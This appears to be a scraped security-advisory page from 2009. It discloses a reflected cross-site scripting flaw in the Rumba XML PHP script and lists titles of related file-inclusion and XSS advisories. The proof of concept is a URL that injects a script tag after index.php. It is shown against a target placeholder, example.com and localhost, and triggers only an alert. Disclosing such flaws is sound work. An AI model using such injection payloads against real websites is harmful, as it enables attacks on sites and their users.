Related information Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) phpPollScript - 1.3 Remote File Include SMF (Simple Machine Forum) 1.1.11 XSS - Discovered by : Khashayar Fereidani [ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability [ISecAuditors Security Advisories] Simple PHP Blog <= 0.5.1 Local File Include vulnerability From:hadikiamarsi_(at)_hotmail.com <hadikiamarsi_(at)_hotmail.com> Date:21.12.2009Subject:Rumba XML XSS vulnerability########################################### # # Script Name : Rumba XML ( All Version ) # # Bug Type : XSS vulnerability # # Found by : Hadi Kiamarsi # # Contact : hadikiamarsi [at] hotmail.com # # Download : http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/6000564 63/webscripts/PHP/xml18eng.zip # ########################################### PoC : http://[target]/[path]/index.php/>"><script>alert('Hadi Kiamarsi')</script> example : http://www.example.com/index.php/>"><script>alert('Hadi Kiamarsi')</script> local Example : http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script>
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
phpPollScript - 1.3 Remote File Include
SMF (Simple Machine Forum) 1.1.11 XSS - Discovered by : Khashayar Fereidani
[ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability
[ISecAuditors Security Advisories] Simple PHP Blog <= 0.5.1 Local File Include vulnerability
